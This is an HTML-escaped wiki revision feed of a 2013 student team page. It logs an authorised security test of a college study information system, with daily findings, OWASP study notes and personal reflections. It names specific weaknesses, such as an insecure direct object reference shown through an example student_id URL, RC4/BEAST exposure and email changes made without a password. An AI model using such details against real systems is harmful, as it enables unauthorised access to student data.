* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** Googeled a lot&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62374</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62374"/>
		<updated>2013-04-05T06:10:12Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Materials (slides etc) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
